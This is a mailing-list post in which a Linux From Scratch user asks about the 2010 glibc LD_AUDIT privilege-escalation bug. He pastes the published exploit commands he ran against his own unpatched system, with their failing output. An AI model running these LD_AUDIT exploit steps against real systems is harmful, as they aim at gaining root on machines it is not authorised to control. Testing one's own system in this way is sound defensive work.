On Thu, Nov 11, 2010 at 09:16:53PM +0000, Ken Moffat wrote:
> On Thu, Nov 11, 2010 at 08:40:24PM +0100, bendeguz wrote:
> > Do I have to worry about the mentioned security bug
> > in glibc? I'm using version 2.11.1.
> > 
>  It's fixed in -dev by the ld_audit_fix and origin_fix patches.  I
> think they also apply to 2.11.1, but I'm not sure.  See the archives
> for lfs-dev last month.  Some of us using 2.12.1 have managed to
> upgrade glibc in an existing system, but only using the same options
> and version, and I think we all had good backups in case it went
> wrong - I still find doing that scary, and shutting down to reboot
> wasn't clean (but, I use ext4 so no worries there).
>
Hi!

I tried the exploits on the lfs-dev mailing list and the 
exploit here http://seclists.org/fulldisclosure/2010/Oct/257,
but something is wrong. It doesn't work as "expected".

In the latter case:

$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
Inconsistency detected by ld.so: dl-open.c: 231: dl_open_worker: Assertion
'(call_map)->l_name[0] == '\0'' failed!

Then, from the console, it drops me to the login prompt.

In DJ Lucas's example 
http://linuxfromscratch.org/pipermail/lfs-dev/2010-October/064372.html

bash-4.1$ ls /usr/bin/bad
ls: cannot access /usr/bin/bad: No such file or directory
bash-4.1$ umask 0
bash-4.1$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/usr/bin/bad" ping
ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: 
undefined symbol: la_version; ignored.
ping: missing host operand
Try `ping --help' or `ping --usage' for more information.
bash-4.1$ ls /usr/bin/bad -l
ls: cannot access /usr/bin/bad: No such file or directory
bash-4.1$ 

In Bryan's example:
http://linuxfromscratch.org/pipermail/lfs-dev/2010-October/064368.html

bash-4.1$ gcc -fPIC -shared -o /tmp/libbad.so.0 bad.c 
bash-4.1$ LD_AUDIT=/tmp/libbad.so.0 EXPLOIT_TGT=/usr/bin/bad ping
ERROR: ld.so: object '/tmp/libbad.so.0' cannot be loaded as audit interface: 
failed to map segment from shared object; ignored.
ping: missing host operand
Try `ping --help' or `ping --usage' for more information.
bash-4.1$ ls /usr/bin/bad 
ls: cannot access /usr/bin/bad: No such file or directory
bash-4.1$ sudo mv /tmp/libbad.so.0 /lib
bash-4.1$ LD_AUDIT=libbad.so.0 EXPLOIT_TGT=/usr/bin/bad ping
ERROR: ld.so: object 'libbad.so.0' cannot be loaded as audit interface: 
undefined symbol: la_version; ignored.
ping: missing host operand
Try `ping --help' or `ping --usage' for more information.
bash-4.1$ ls /usr/bin/bad
ls: cannot access /usr/bin/bad: No such file or directory
bash-4.1$ 

I have glibc-2.11.1 and it's not been patched yet.
It's just a desktop computer, but I'm curious about the issue.

Thanks for your time!
Regards,
bendeguz


-- 
http://linuxfromscratch.org/mailman/listinfo/blfs-support
FAQ: http://www.linuxfromscratch.org/blfs/faq.html
Unsubscribe: See the above information page
